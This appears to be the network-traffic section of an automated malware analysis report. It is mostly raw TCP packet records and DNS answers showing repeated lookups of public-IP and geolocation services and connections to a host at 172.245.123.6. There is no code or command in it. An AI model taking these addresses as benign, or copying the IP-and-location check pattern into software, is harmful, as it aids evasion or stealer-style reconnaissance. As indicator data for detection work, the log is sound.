                                                                                  Sep 30, 2024 10:12:32.335364103 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335372925 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335392952 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335400105 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335406065 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335407019 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335414886 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335426092 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335427046 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335452080 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335472107 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335488081 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335499048 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335509062 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335514069 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335514069 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335514069 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335514069 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335520029 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335530043 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335530996 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335540056 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335545063 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335551023 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335556984 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335561991 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335572004 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335576057 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335582018 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335582972 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:32.335601091 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335608006 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:32.335642099 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:36.437736034 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:36.438432932 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:39.922867060 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:39.922905922 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:39.922966003 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:39.923556089 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:39.923572063 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:40.391961098 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:40.392067909 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:40.400432110 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:40.400439978 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:40.405565977 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:40.405571938 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:40.889161110 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:41.211750984 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.211826086 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.211925030 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:41.258064032 CEST49168443192.168.2.22172.67.216.244
                                                                                  Sep 30, 2024 10:12:41.258089066 CEST44349168172.67.216.244192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.968570948 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.968614101 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.968678951 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.969811916 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.969820023 CEST44349170104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.969862938 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.974513054 CEST4917180192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:41.979367971 CEST8049171172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.979449034 CEST4917180192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:41.993644953 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.993669033 CEST44349170104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.994004011 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:41.994016886 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.449218988 CEST44349170104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.449327946 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.484076977 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.484241962 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.523631096 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.523672104 CEST44349170104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.524049044 CEST44349170104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.524302006 CEST49170443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.529635906 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.529664993 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.530010939 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:42.530055046 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.659636974 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:42.707634926 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.445547104 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.445638895 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.445638895 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:43.445792913 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:43.544266939 CEST49169443192.168.2.22104.21.78.54
                                                                                  Sep 30, 2024 10:12:43.544307947 CEST44349169104.21.78.54192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.681503057 CEST4917180192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:43.682862043 CEST4917280192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:43.687011957 CEST8049171172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.687078953 CEST4917180192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:43.687709093 CEST8049172172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:43.687781096 CEST4917280192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:43.793008089 CEST4917280192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:43.797995090 CEST8049172172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:44.169147968 CEST8049172172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:44.169207096 CEST4917280192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:46.647516012 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:46.652419090 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:46.652477980 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:46.688663006 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:46.693497896 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.158879042 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.368921995 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.369044065 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:47.789362907 CEST4917380192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:12:47.794271946 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.902633905 CEST8049173193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.996093988 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:47.996193886 CEST44349174188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.996262074 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:12:48.006556034 CEST49174443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:04.035880089 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:04.035968065 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:04.038429022 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:04.043196917 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.162117004 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.162138939 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.162242889 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.162306070 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:05.162306070 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:05.177231073 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.177273989 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.177335024 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.177700043 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.177709103 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.633023977 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.636029005 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.636054039 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.781502008 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.781610012 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.781661987 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.782198906 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.799084902 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:05.804291010 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.804344893 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:05.821516037 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:05.826411963 CEST8049195132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.826528072 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:05.826762915 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:05.831542015 CEST8049195132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.520313978 CEST8049195132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.543584108 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:06.543625116 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.543694973 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:06.544176102 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:06.544188023 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.728717089 CEST8049195132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.728857040 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:07.020762920 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.025177002 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:07.025202036 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.171710014 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.171814919 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.171915054 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:07.172818899 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:07.210211992 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:07.215910912 CEST8049195132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.215987921 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:07.250468016 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:07.255465031 CEST8049197158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.255534887 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:07.255975962 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:07.261136055 CEST8049197158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.819729090 CEST8049197158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.834464073 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:07.834503889 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.834563971 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:07.834983110 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:07.835004091 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.024512053 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:08.028758049 CEST8049197158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.028825045 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:08.318072081 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.321397066 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:08.321413994 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.467511892 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.467627048 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.467879057 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:08.468271971 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:08.481681108 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:08.487198114 CEST8049197158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.487281084 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:08.508330107 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:08.513194084 CEST8049199132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.513257980 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:08.513355970 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:08.518136978 CEST8049199132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.177819967 CEST8049199132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.200855970 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:09.200896978 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.200953007 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:09.201412916 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:09.201421976 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.384794950 CEST8049199132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.384854078 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:09.676590919 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.680249929 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:09.680262089 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.823409081 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.823504925 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.823556900 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:09.824107885 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:10.566524982 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:10.571968079 CEST8049199132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:10.572082996 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:10.835136890 CEST4920180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:10.840140104 CEST8049201193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:10.842946053 CEST4920180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:10.859591007 CEST4920180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:10.864396095 CEST8049201193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.298773050 CEST8049201193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.350042105 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:11.350094080 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.350142002 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:11.350589991 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:11.350601912 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.508704901 CEST8049201193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.508774042 CEST4920180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:11.805995941 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.809509039 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:11.809536934 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.928837061 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.928972960 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.929063082 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:11.929996967 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:57.695086956 CEST8049178132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:57.695241928 CEST4917880192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:14:05.396092892 CEST8049186158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:14:05.396236897 CEST4918680192.168.2.22158.101.44.242
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                  Sep 30, 2024 10:12:58.410876989 CEST8.8.8.8192.168.2.220x6978No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.410876989 CEST8.8.8.8192.168.2.220x6978No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.410876989 CEST8.8.8.8192.168.2.220x6978No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST8.8.8.8192.168.2.220xce3bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST8.8.8.8192.168.2.220x13b1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:00.439730883 CEST8.8.8.8192.168.2.220xc3c7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:00.439730883 CEST8.8.8.8192.168.2.220xc3c7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:00.804769039 CEST8.8.8.8192.168.2.220x3cb4No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:00.804769039 CEST8.8.8.8192.168.2.220x3cb4No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST8.8.8.8192.168.2.220xa773No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST8.8.8.8192.168.2.220xca10No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:03.390327930 CEST8.8.8.8192.168.2.220x2e8aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:03.390327930 CEST8.8.8.8192.168.2.220x2e8aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST8.8.8.8192.168.2.220x73b9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST8.8.8.8192.168.2.220x76b2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.176615953 CEST8.8.8.8192.168.2.220xc343No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.176615953 CEST8.8.8.8192.168.2.220xc343No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST8.8.8.8192.168.2.220x9ee4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
